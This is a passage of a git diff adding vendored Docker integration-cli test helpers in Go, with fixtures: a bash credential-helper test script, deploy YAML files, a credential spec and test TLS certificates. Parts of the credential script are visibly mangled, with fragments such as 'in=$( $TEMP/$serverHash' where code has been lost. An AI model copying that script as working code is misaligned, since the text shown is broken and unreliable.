the image: %s", out) + } + return getIDByName(name) +} + +type gitServer interface { + URL() string + Close() error +} + +type localGitServer struct { + *httptest.Server +} + +func (r *localGitServer) Close() error { + r.Server.Close() + return nil +} + +func (r *localGitServer) URL() string { + return r.Server.URL +} + +type fakeGit struct { + root string + server gitServer + RepoURL string +} + +func (g *fakeGit) Close() { + g.server.Close() + os.RemoveAll(g.root) +} + +func newFakeGit(name string, files map[string]string, enforceLocalServer bool) (*fakeGit, error) { + ctx, err := fakeContextWithFiles(files) + if err != nil { + return nil, err + } + defer ctx.Close() + curdir, err := os.Getwd() + if err != nil { + return nil, err + } + defer os.Chdir(curdir) + + if output, err := exec.Command("git", "init", ctx.Dir).CombinedOutput(); err != nil { + return nil, fmt.Errorf("error trying to init repo: %s (%s)", err, output) + } + err = os.Chdir(ctx.Dir) + if err != nil { + return nil, err + } + if output, err := exec.Command("git", "config", "user.name", "Fake User").CombinedOutput(); err != nil { + return nil, fmt.Errorf("error trying to set 'user.name': %s (%s)", err, output) + } + if output, err := exec.Command("git", "config", "user.email", "fake.user@example.com").CombinedOutput(); err != nil { + return nil, fmt.Errorf("error trying to set 'user.email': %s (%s)", err, output) + } + if output, err := exec.Command("git", "add", "*").CombinedOutput(); err != nil { + return nil, fmt.Errorf("error trying to add files to repo: %s (%s)", err, output) + } + if output, err := exec.Command("git", "commit", "-a", "-m", "Initial commit").CombinedOutput(); err != nil { + return nil, fmt.Errorf("error trying to commit to repo: %s (%s)", err, output) + } + + root, err := ioutil.TempDir("", "docker-test-git-repo") + if err != nil { + return nil, err + } + repoPath := filepath.Join(root, name+".git") + if output, err := exec.Command("git", "clone", "--bare", ctx.Dir, repoPath).CombinedOutput(); err != nil { + os.RemoveAll(root) + return nil, fmt.Errorf("error trying to clone --bare: %s (%s)", err, output) + } + err = os.Chdir(repoPath) + if err != nil { + os.RemoveAll(root) + return nil, err + } + if output, err := exec.Command("git", "update-server-info").CombinedOutput(); err != nil { + os.RemoveAll(root) + return nil, fmt.Errorf("error trying to git update-server-info: %s (%s)", err, output) + } + err = os.Chdir(curdir) + if err != nil { + os.RemoveAll(root) + return nil, err + } + + var server gitServer + if !enforceLocalServer { + // use fakeStorage server, which might be local or remote (at test daemon) + server, err = fakeStorageWithContext(fakeContextFromDir(root)) + if err != nil { + return nil, fmt.Errorf("cannot start fake storage: %v", err) + } + } else { + // always start a local http server on CLI test machine + httpServer := httptest.NewServer(http.FileServer(http.Dir(root))) + server = &localGitServer{httpServer} + } + return &fakeGit{ + root: root, + server: server, + RepoURL: fmt.Sprintf("%s/%s.git", server.URL(), name), + }, nil +} + +// Write `content` to the file at path `dst`, creating it if necessary, +// as well as any missing directories. +// The file is truncated if it already exists. +// Fail the test when error occurs. +func writeFile(dst, content string, c *check.C) { + // Create subdirectories if necessary + c.Assert(os.MkdirAll(path.Dir(dst), 0700), check.IsNil) + f, err := os.OpenFile(dst, os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0700) + c.Assert(err, check.IsNil) + defer f.Close() + // Write content (truncate if it exists) + _, err = io.Copy(f, strings.NewReader(content)) + c.Assert(err, check.IsNil) +} + +// Return the contents of file at path `src`. +// Fail the test when error occurs. +func readFile(src string, c *check.C) (content string) { + data, err := ioutil.ReadFile(src) + c.Assert(err, check.IsNil) + + return string(data) +} + +func containerStorageFile(containerID, basename string) string { + return filepath.Join(containerStoragePath, containerID, basename) +} + +// docker commands that use this function must be run with the '-d' switch. +func runCommandAndReadContainerFile(filename string, cmd *exec.Cmd) ([]byte, error) { + out, _, err := runCommandWithOutput(cmd) + if err != nil { + return nil, fmt.Errorf("%v: %q", err, out) + } + + contID := strings.TrimSpace(out) + + if err := waitRun(contID); err != nil { + return nil, fmt.Errorf("%v: %q", contID, err) + } + + return readContainerFile(contID, filename) +} + +func readContainerFile(containerID, filename string) ([]byte, error) { + f, err := os.Open(containerStorageFile(containerID, filename)) + if err != nil { + return nil, err + } + defer f.Close() + + content, err := ioutil.ReadAll(f) + if err != nil { + return nil, err + } + + return content, nil +} + +func readContainerFileWithExec(containerID, filename string) ([]byte, error) { + out, _, err := runCommandWithOutput(exec.Command(dockerBinary, "exec", containerID, "cat", filename)) + return []byte(out), err +} + +// daemonTime provides the current time on the daemon host +func daemonTime(c *check.C) time.Time { + if isLocalDaemon { + return time.Now() + } + + status, body, err := sockRequest("GET", "/info", nil) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusOK) + + type infoJSON struct { + SystemTime string + } + var info infoJSON + err = json.Unmarshal(body, &info) + c.Assert(err, check.IsNil, check.Commentf("unable to unmarshal GET /info response")) + + dt, err := time.Parse(time.RFC3339Nano, info.SystemTime) + c.Assert(err, check.IsNil, check.Commentf("invalid time format in GET /info response")) + return dt +} + +// daemonUnixTime returns the current time on the daemon host with nanoseconds precision. +// It return the time formatted how the client sends timestamps to the server. +func daemonUnixTime(c *check.C) string { + return parseEventTime(daemonTime(c)) +} + +func parseEventTime(t time.Time) string { + return fmt.Sprintf("%d.%09d", t.Unix(), int64(t.Nanosecond())) +} + +func setupRegistry(c *check.C, schema1 bool, auth, tokenURL string) *testRegistryV2 { + reg, err := newTestRegistryV2(c, schema1, auth, tokenURL) + c.Assert(err, check.IsNil) + + // Wait for registry to be ready to serve requests. + for i := 0; i != 50; i++ { + if err = reg.Ping(); err == nil { + break + } + time.Sleep(100 * time.Millisecond) + } + + c.Assert(err, check.IsNil, check.Commentf("Timeout waiting for test registry to become available: %v", err)) + return reg +} + +func setupNotary(c *check.C) *testNotary { + ts, err := newTestNotary(c) + c.Assert(err, check.IsNil) + + return ts +} + +// appendBaseEnv appends the minimum set of environment variables to exec the +// docker cli binary for testing with correct configuration to the given env +// list. +func appendBaseEnv(isTLS bool, env ...string) []string { + preserveList := []string{ + // preserve remote test host + "DOCKER_HOST", + + // windows: requires preserving SystemRoot, otherwise dial tcp fails + // with "GetAddrInfoW: A non-recoverable error occurred during a database lookup." + "SystemRoot", + + // testing help text requires the $PATH to dockerd is set + "PATH", + } + if isTLS { + preserveList = append(preserveList, "DOCKER_TLS_VERIFY", "DOCKER_CERT_PATH") + } + + for _, key := range preserveList { + if val := os.Getenv(key); val != "" { + env = append(env, fmt.Sprintf("%s=%s", key, val)) + } + } + return env +} + +func createTmpFile(c *check.C, content string) string { + f, err := ioutil.TempFile("", "testfile") + c.Assert(err, check.IsNil) + + filename := f.Name() + + err = ioutil.WriteFile(filename, []byte(content), 0644) + c.Assert(err, check.IsNil) + + return filename +} + +func buildImageWithOutInDamon(socket string, name, dockerfile string, useCache bool) (string, error) { + args := []string{"--host", socket} + buildCmd := buildImageCmdArgs(args, name, dockerfile, useCache) + out, exitCode, err := runCommandWithOutput(buildCmd) + if err != nil || exitCode != 0 { + return out, fmt.Errorf("failed to build the image: %s, error: %v", out, err) + } + return out, nil +} + +func buildImageCmdArgs(args []string, name, dockerfile string, useCache bool) *exec.Cmd { + args = append(args, []string{"-D", "build", "-t", name}...) + if !useCache { + args = append(args, "--no-cache") + } + args = append(args, "-") + buildCmd := exec.Command(dockerBinary, args...) + buildCmd.Stdin = strings.NewReader(dockerfile) + return buildCmd + +} + +func waitForContainer(contID string, args ...string) error { + args = append([]string{dockerBinary, "run", "--name", contID}, args...) + result := icmd.RunCmd(icmd.Cmd{Command: args}) + if result.Error != nil { + return result.Error + } + return waitRun(contID) +} + +// waitRestart will wait for the specified container to restart once +func waitRestart(contID string, duration time.Duration) error { + return waitInspect(contID, "{{.RestartCount}}", "1", duration) +} + +// waitRun will wait for the specified container to be running, maximum 5 seconds. +func waitRun(contID string) error { + return waitInspect(contID, "{{.State.Running}}", "true", 5*time.Second) +} + +// waitExited will wait for the specified container to state exit, subject +// to a maximum time limit in seconds supplied by the caller +func waitExited(contID string, duration time.Duration) error { + return waitInspect(contID, "{{.State.Status}}", "exited", duration) +} + +// waitInspect will wait for the specified container to have the specified string +// in the inspect output. It will wait until the specified timeout (in seconds) +// is reached. +func waitInspect(name, expr, expected string, timeout time.Duration) error { + return waitInspectWithArgs(name, expr, expected, timeout) +} + +func waitInspectWithArgs(name, expr, expected string, timeout time.Duration, arg ...string) error { + after := time.After(timeout) + + args := append(arg, "inspect", "-f", expr, name) + for { + result := icmd.RunCommand(dockerBinary, args...) + if result.Error != nil { + if !strings.Contains(result.Stderr(), "No such") { + return fmt.Errorf("error executing docker inspect: %v\n%s", + result.Stderr(), result.Stdout()) + } + select { + case <-after: + return result.Error + default: + time.Sleep(10 * time.Millisecond) + continue + } + } + + out := strings.TrimSpace(result.Stdout()) + if out == expected { + break + } + + select { + case <-after: + return fmt.Errorf("condition \"%q == %q\" not true in time", out, expected) + default: + } + + time.Sleep(100 * time.Millisecond) + } + return nil +} + +func getInspectBody(c *check.C, version, id string) []byte { + endpoint := fmt.Sprintf("/%s/containers/%s/json", version, id) + status, body, err := sockRequest("GET", endpoint, nil) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusOK) + return body +} + +// Run a long running idle task in a background container using the +// system-specific default image and command. +func runSleepingContainer(c *check.C, extraArgs ...string) (string, int) { + return runSleepingContainerInImage(c, defaultSleepImage, extraArgs...) +} + +// Run a long running idle task in a background container using the specified +// image and the system-specific command. +func runSleepingContainerInImage(c *check.C, image string, extraArgs ...string) (string, int) { + args := []string{"run", "-d"} + args = append(args, extraArgs...) + args = append(args, image) + args = append(args, sleepCommandForDaemonPlatform()...) + return dockerCmd(c, args...) +} + +func getRootUIDGID() (int, int, error) { + uidgid := strings.Split(filepath.Base(dockerBasePath), ".") + if len(uidgid) == 1 { + //user namespace remapping is not turned on; return 0 + return 0, 0, nil + } + uid, err := strconv.Atoi(uidgid[0]) + if err != nil { + return 0, 0, err + } + gid, err := strconv.Atoi(uidgid[1]) + if err != nil { + return 0, 0, err + } + return uid, gid, nil +} + +// minimalBaseImage returns the name of the minimal base image for the current +// daemon platform. +func minimalBaseImage() string { + if daemonPlatform == "windows" { + return WindowsBaseImage + } + return "scratch" +} + +func getGoroutineNumber() (int, error) { + i := struct { + NGoroutines int + }{} + status, b, err := sockRequest("GET", "/info", nil) + if err != nil { + return 0, err + } + if status != http.StatusOK { + return 0, fmt.Errorf("http status code: %d", status) + } + if err := json.Unmarshal(b, &i); err != nil { + return 0, err + } + return i.NGoroutines, nil +} + +func waitForGoroutines(expected int) error { + t := time.After(30 * time.Second) + for { + select { + case <-t: + n, err := getGoroutineNumber() + if err != nil { + return err + } + if n > expected { + return fmt.Errorf("leaked goroutines: expected less than or equal to %d, got: %d", expected, n) + } + default: + n, err := getGoroutineNumber() + if err != nil { + return err + } + if n <= expected { + return nil + } + time.Sleep(200 * time.Millisecond) + } + } +} + +// getErrorMessage returns the error message from an error API response +func getErrorMessage(c *check.C, body []byte) string { + var resp types.ErrorResponse + c.Assert(json.Unmarshal(body, &resp), check.IsNil) + return strings.TrimSpace(resp.Message) +} + +func waitAndAssert(c *check.C, timeout time.Duration, f checkF, checker check.Checker, args ...interface{}) { + after := time.After(timeout) + for { + v, comment := f(c) + assert, _ := checker.Check(append([]interface{}{v}, args...), checker.Info().Params) + select { + case <-after: + assert = true + default: + } + if assert { + if comment != nil { + args = append(args, comment) + } + c.Assert(v, checker, args...) + return + } + time.Sleep(100 * time.Millisecond) + } +} + +type checkF func(*check.C) (interface{}, check.CommentInterface) +type reducer func(...interface{}) interface{} + +func reducedCheck(r reducer, funcs ...checkF) checkF { + return func(c *check.C) (interface{}, check.CommentInterface) { + var values []interface{} + var comments []string + for _, f := range funcs { + v, comment := f(c) + values = append(values, v) + if comment != nil { + comments = append(comments, comment.CheckCommentString()) + } + } + return r(values...), check.Commentf("%v", strings.Join(comments, ", ")) + } +} + +func sumAsIntegers(vals ...interface{}) interface{} { + var s int + for _, v := range vals { + s += v.(int) + } + return s +} diff --git a/vendor/github.com/docker/docker/integration-cli/events_utils.go b/vendor/github.com/docker/docker/integration-cli/events_utils.go new file mode 100644 index 0000000000..ba241796b3 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/events_utils.go @@ -0,0 +1,206 @@ +package main + +import ( + "bufio" + "bytes" + "io" + "os/exec" + "regexp" + "strconv" + "strings" + + "github.com/Sirupsen/logrus" + eventstestutils "github.com/docker/docker/daemon/events/testutils" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// eventMatcher is a function that tries to match an event input. +// It returns true if the event matches and a map with +// a set of key/value to identify the match. +type eventMatcher func(text string) (map[string]string, bool) + +// eventMatchProcessor is a function to handle an event match. +// It receives a map of key/value with the information extracted in a match. +type eventMatchProcessor func(matches map[string]string) + +// eventObserver runs an events commands and observes its output. +type eventObserver struct { + buffer *bytes.Buffer + command *exec.Cmd + scanner *bufio.Scanner + startTime string + disconnectionError error +} + +// newEventObserver creates the observer and initializes the command +// without running it. Users must call `eventObserver.Start` to start the command. +func newEventObserver(c *check.C, args ...string) (*eventObserver, error) { + since := daemonTime(c).Unix() + return newEventObserverWithBacklog(c, since, args...) +} + +// newEventObserverWithBacklog creates a new observer changing the start time of the backlog to return. +func newEventObserverWithBacklog(c *check.C, since int64, args ...string) (*eventObserver, error) { + startTime := strconv.FormatInt(since, 10) + cmdArgs := []string{"events", "--since", startTime} + if len(args) > 0 { + cmdArgs = append(cmdArgs, args...) + } + eventsCmd := exec.Command(dockerBinary, cmdArgs...) + stdout, err := eventsCmd.StdoutPipe() + if err != nil { + return nil, err + } + + return &eventObserver{ + buffer: new(bytes.Buffer), + command: eventsCmd, + scanner: bufio.NewScanner(stdout), + startTime: startTime, + }, nil +} + +// Start starts the events command. +func (e *eventObserver) Start() error { + return e.command.Start() +} + +// Stop stops the events command. +func (e *eventObserver) Stop() { + e.command.Process.Kill() + e.command.Process.Release() +} + +// Match tries to match the events output with a given matcher. +func (e *eventObserver) Match(match eventMatcher, process eventMatchProcessor) { + for e.scanner.Scan() { + text := e.scanner.Text() + e.buffer.WriteString(text) + e.buffer.WriteString("\n") + + if matches, ok := match(text); ok { + process(matches) + } + } + + err := e.scanner.Err() + if err == nil { + err = io.EOF + } + + logrus.Debugf("EventObserver scanner loop finished: %v", err) + e.disconnectionError = err +} + +func (e *eventObserver) CheckEventError(c *check.C, id, event string, match eventMatcher) { + var foundEvent bool + scannerOut := e.buffer.String() + + if e.disconnectionError != nil { + until := daemonUnixTime(c) + out, _ := dockerCmd(c, "events", "--since", e.startTime, "--until", until) + events := strings.Split(strings.TrimSpace(out), "\n") + for _, e := range events { + if _, ok := match(e); ok { + foundEvent = true + break + } + } + scannerOut = out + } + if !foundEvent { + c.Fatalf("failed to observe event `%s` for %s. Disconnection error: %v\nout:\n%v", event, id, e.disconnectionError, scannerOut) + } +} + +// matchEventLine matches a text with the event regular expression. +// It returns the matches and true if the regular expression matches with the given id and event type. +// It returns an empty map and false if there is no match. +func matchEventLine(id, eventType string, actions map[string]chan bool) eventMatcher { + return func(text string) (map[string]string, bool) { + matches := eventstestutils.ScanMap(text) + if len(matches) == 0 { + return matches, false + } + + if matchIDAndEventType(matches, id, eventType) { + if _, ok := actions[matches["action"]]; ok { + return matches, true + } + } + return matches, false + } +} + +// processEventMatch closes an action channel when an event line matches the expected action. +func processEventMatch(actions map[string]chan bool) eventMatchProcessor { + return func(matches map[string]string) { + if ch, ok := actions[matches["action"]]; ok { + ch <- true + } + } +} + +// parseEventAction parses an event text and returns the action. +// It fails if the text is not in the event format. +func parseEventAction(c *check.C, text string) string { + matches := eventstestutils.ScanMap(text) + return matches["action"] +} + +// eventActionsByIDAndType returns the actions for a given id and type. +// It fails if the text is not in the event format. +func eventActionsByIDAndType(c *check.C, events []string, id, eventType string) []string { + var filtered []string + for _, event := range events { + matches := eventstestutils.ScanMap(event) + c.Assert(matches, checker.Not(checker.IsNil)) + if matchIDAndEventType(matches, id, eventType) { + filtered = append(filtered, matches["action"]) + } + } + return filtered +} + +// matchIDAndEventType returns true if an event matches a given id and type. +// It also resolves names in the event attributes if the id doesn't match. +func matchIDAndEventType(matches map[string]string, id, eventType string) bool { + return matchEventID(matches, id) && matches["eventType"] == eventType +} + +func matchEventID(matches map[string]string, id string) bool { + matchID := matches["id"] == id || strings.HasPrefix(matches["id"], id) + if !matchID && matches["attributes"] != "" { + // try matching a name in the attributes + attributes := map[string]string{} + for _, a := range strings.Split(matches["attributes"], ", ") { + kv := strings.Split(a, "=") + attributes[kv[0]] = kv[1] + } + matchID = attributes["name"] == id + } + return matchID +} + +func parseEvents(c *check.C, out, match string) { + events := strings.Split(strings.TrimSpace(out), "\n") + for _, event := range events { + matches := eventstestutils.ScanMap(event) + matched, err := regexp.MatchString(match, matches["action"]) + c.Assert(err, checker.IsNil) + c.Assert(matched, checker.True, check.Commentf("Matcher: %s did not match %s", match, matches["action"])) + } +} + +func parseEventsWithID(c *check.C, out, match, id string) { + events := strings.Split(strings.TrimSpace(out), "\n") + for _, event := range events { + matches := eventstestutils.ScanMap(event) + c.Assert(matchEventID(matches, id), checker.True) + + matched, err := regexp.MatchString(match, matches["action"]) + c.Assert(err, checker.IsNil) + c.Assert(matched, checker.True, check.Commentf("Matcher: %s did not match %s", match, matches["action"])) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures.go b/vendor/github.com/docker/docker/integration-cli/fixtures.go new file mode 100644 index 0000000000..e99b738158 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures.go @@ -0,0 +1,69 @@ +package main + +import ( + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "sync" +) + +var ensureHTTPServerOnce sync.Once + +func ensureHTTPServerImage() error { + var doIt bool + ensureHTTPServerOnce.Do(func() { + doIt = true + }) + + if !doIt { + return nil + } + + protectedImages["httpserver:latest"] = struct{}{} + + tmp, err := ioutil.TempDir("", "docker-http-server-test") + if err != nil { + return fmt.Errorf("could not build http server: %v", err) + } + defer os.RemoveAll(tmp) + + goos := daemonPlatform + if goos == "" { + goos = "linux" + } + goarch := os.Getenv("DOCKER_ENGINE_GOARCH") + if goarch == "" { + goarch = "amd64" + } + + goCmd, lookErr := exec.LookPath("go") + if lookErr != nil { + return fmt.Errorf("could not build http server: %v", lookErr) + } + + cmd := exec.Command(goCmd, "build", "-o", filepath.Join(tmp, "httpserver"), "github.com/docker/docker/contrib/httpserver") + cmd.Env = append(os.Environ(), []string{ + "CGO_ENABLED=0", + "GOOS=" + goos, + "GOARCH=" + goarch, + }...) + var out []byte + if out, err = cmd.CombinedOutput(); err != nil { + return fmt.Errorf("could not build http server: %s", string(out)) + } + + cpCmd, lookErr := exec.LookPath("cp") + if lookErr != nil { + return fmt.Errorf("could not build http server: %v", lookErr) + } + if out, err = exec.Command(cpCmd, "../contrib/httpserver/Dockerfile", filepath.Join(tmp, "Dockerfile")).CombinedOutput(); err != nil { + return fmt.Errorf("could not build http server: %v", string(out)) + } + + if out, err = exec.Command(dockerBinary, "build", "-q", "-t", "httpserver", tmp).CombinedOutput(); err != nil { + return fmt.Errorf("could not build http server: %v", string(out)) + } + return nil +} diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test b/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test new file mode 100755 index 0000000000..a7be56b2f2 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/auth/docker-credential-shell-test @@ -0,0 +1,55 @@ +#!/bin/bash + +set -e + +listFile=shell_test_list.json + +case $1 in + "store") + in=$( $TEMP/$serverHash + # add the server to the list file + if [[ ! -f $TEMP/$listFile ]]; then + echo "{ \"${server}\": \"${username}\" }" > $TEMP/$listFile + else + list=$(<$TEMP/$listFile) + echo "$list" | jq ". + {\"${server}\": \"${username}\"}" > $TEMP/$listFile + fi + ;; + "get") + in=$( $TEMP/$listFile + ;; + "list") + if [[ ! -f $TEMP/$listFile ]]; then + echo "{}" + else + payload=$(<$TEMP/$listFile) + echo "$payload" + fi + ;; + *) + echo "unknown credential option" + exit 1 + ;; +esac diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/credentialspecs/valid.json b/vendor/github.com/docker/docker/integration-cli/fixtures/credentialspecs/valid.json new file mode 100644 index 0000000000..28913e49de --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/credentialspecs/valid.json @@ -0,0 +1,25 @@ +{ + "CmsPlugins": [ + "ActiveDirectory" + ], + "DomainJoinConfig": { + "Sid": "S-1-5-21-4288985-3632099173-1864715694", + "MachineAccountName": "MusicStoreAcct", + "Guid": "3705d4c3-0b80-42a9-ad97-ebc1801c74b9", + "DnsTreeName": "hyperv.local", + "DnsName": "hyperv.local", + "NetBiosName": "hyperv" + }, + "ActiveDirectoryConfig": { + "GroupManagedServiceAccounts": [ + { + "Name": "MusicStoreAcct", + "Scope": "hyperv.local" + }, + { + "Name": "MusicStoreAcct", + "Scope": "hyperv" + } + ] + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml new file mode 100644 index 0000000000..f30c04f8f1 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml @@ -0,0 +1,9 @@ + +version: "3" +services: + web: + image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 + command: top + db: + image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 + command: "tail -f /dev/null" diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml new file mode 100644 index 0000000000..4ec8cacc9b --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml @@ -0,0 +1,11 @@ + +version: "3.1" +services: + web: + image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 + command: top + secrets: + - special +secrets: + special: + file: fixtures/secrets/default diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml new file mode 100644 index 0000000000..6ac92cddee --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml @@ -0,0 +1,20 @@ + +version: "3.1" +services: + web: + image: busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 + command: top + secrets: + - special + - source: super + target: foo.txt + mode: 0400 + - star +secrets: + special: + file: fixtures/secrets/default + super: + file: fixtures/secrets/default + star: + external: + name: outside diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem new file mode 100644 index 0000000000..6825d6d1bd --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem @@ -0,0 +1,23 @@ +-----BEGIN CERTIFICATE----- +MIID0TCCAzqgAwIBAgIJAP2r7GqEJwSnMA0GCSqGSIb3DQEBBQUAMIGiMQswCQYD +VQQGEwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMG +A1UEChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTERMA8GA1UEAxMI +Y2hhbmdlbWUxETAPBgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWls +QGhvc3QuZG9tYWluMB4XDTEzMTIwMzE2NTYzMFoXDTIzMTIwMTE2NTYzMFowgaIx +CzAJBgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2Nv +MRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMREwDwYD +VQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEW +EG1haWxAaG9zdC5kb21haW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALAn +0xDw+5y7ZptQacq66pUhRu82JP2WU6IDgo5QUtNU6/CX5PwQATe/OnYTZQFbksxp +AU9boG0FCkgxfsgPYXEuZxVEGKI2fxfKHOZZI8mrkWmj6eWU/0cvCjGVc9rTITP5 +sNQvg+hORyVDdNp2IdsbMJayiB3AQYMFx3vSDOMTAgMBAAGjggELMIIBBzAdBgNV +HQ4EFgQUZu7DFz09q0QBa2+ymRm9qgK1NPswgdcGA1UdIwSBzzCBzIAUZu7DFz09 +q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJD +QTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24x +ETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMI +Y2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21haW6CCQD9q+xq +hCcEpzAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBAF8fJKKM+/oOdnNi +zEd0M1+PmZOyqvjYQn/2ZR8UHH6Imgc/OPQKZXf0bVE1Txc/DaUNn9Isd1SuCuaE +ic3vAIYYU7PmgeNN6vwec48V96T7jr+GAi6AVMhQEc2hHCfVtx11Xx+x6aHDZzJt +Zxtf5lL6KSO9Y+EFwM+rju6hm5hW +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem new file mode 100644 index 0000000000..c05ed47c2c --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem @@ -0,0 +1,73 @@ +Certificate: + Data: + Version: 3 (0x2) + Serial Number: 3 (0x3) + Signature Algorithm: sha1WithRSAEncryption + Issuer: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain + Validity + Not Before: Dec 4 14:17:54 2013 GMT + Not After : Dec 2 14:17:54 2023 GMT + Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=client/name=changeme/emailAddress=mail@host.domain + Subject Public Key Info: + Public Key Algorithm: rsaEncryption + Public-Key: (1024 bit) + Modulus: + 00:ca:c9:05:d0:09:4e:3e:a4:fc:d5:14:f4:a5:e8: + 34:d3:6b:51:e3:f3:62:ea:a1:f0:e8:ed:c4:2a:bc: + f0:4f:ca:07:df:e3:88:fa:f4:21:99:35:0e:3d:ea: + b0:86:e7:c4:d2:8a:83:2b:42:b8:ec:a3:99:62:70: + 81:46:cc:fc:a5:1d:d2:63:e8:eb:07:25:9a:e2:25: + 6d:11:56:f2:1a:51:a1:b6:3e:1c:57:32:e9:7b:2c: + aa:1b:cc:97:2d:89:2d:b1:c9:5e:35:28:4d:7c:fa: + 65:31:3e:f7:70:dd:6e:0b:3c:58:af:a8:2e:24:c0: + 7e:4e:78:7d:0a:9e:8f:42:43 + Exponent: 65537 (0x10001) + X509v3 extensions: + X509v3 Basic Constraints: + CA:FALSE + Netscape Comment: + Easy-RSA Generated Certificate + X509v3 Subject Key Identifier: + DE:42:EF:2D:98:A3:6C:A8:AA:E0:8C:71:2C:9D:64:23:A9:E2:7E:81 + X509v3 Authority Key Identifier: + keyid:66:EE:C3:17:3D:3D:AB:44:01:6B:6F:B2:99:19:BD:AA:02:B5:34:FB + DirName:/C=US/ST=CA/L=SanFrancisco/O=Fort-Funston/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain + serial:FD:AB:EC:6A:84:27:04:A7 + + X509v3 Extended Key Usage: + TLS Web Client Authentication + X509v3 Key Usage: + Digital Signature + Signature Algorithm: sha1WithRSAEncryption + 1c:44:26:ea:e1:66:25:cb:e4:8e:57:1c:f6:b9:17:22:62:40: + 12:90:8f:3b:b2:61:7a:54:94:8f:b1:20:0b:bf:a3:51:e3:fa: + 1c:a1:be:92:3a:d0:76:44:c0:57:83:ab:6a:e4:1a:45:49:a4: + af:39:0d:60:32:fc:3a:be:d7:fb:5d:99:7a:1f:87:e7:d5:ab: + 84:a2:5e:90:d8:bf:fa:89:6d:32:26:02:5e:31:35:68:7f:31: + f5:6b:51:46:bc:af:70:ed:5a:09:7d:ec:b2:48:4f:fe:c5:2f: + 56:04:ad:f6:c1:d2:2a:e4:6a:c4:87:fe:08:35:c5:38:cb:5e: + 4a:c4 +-----BEGIN CERTIFICATE----- +MIIEFTCCA36gAwIBAgIBAzANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMCVVMx +CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xFTATBgNVBAoTDEZv +cnQtRnVuc3RvbjERMA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1l +MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRv +bWFpbjAeFw0xMzEyMDQxNDE3NTRaFw0yMzEyMDIxNDE3NTRaMIGgMQswCQYDVQQG +EwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UE +ChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTEPMA0GA1UEAxMGY2xp +ZW50MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0 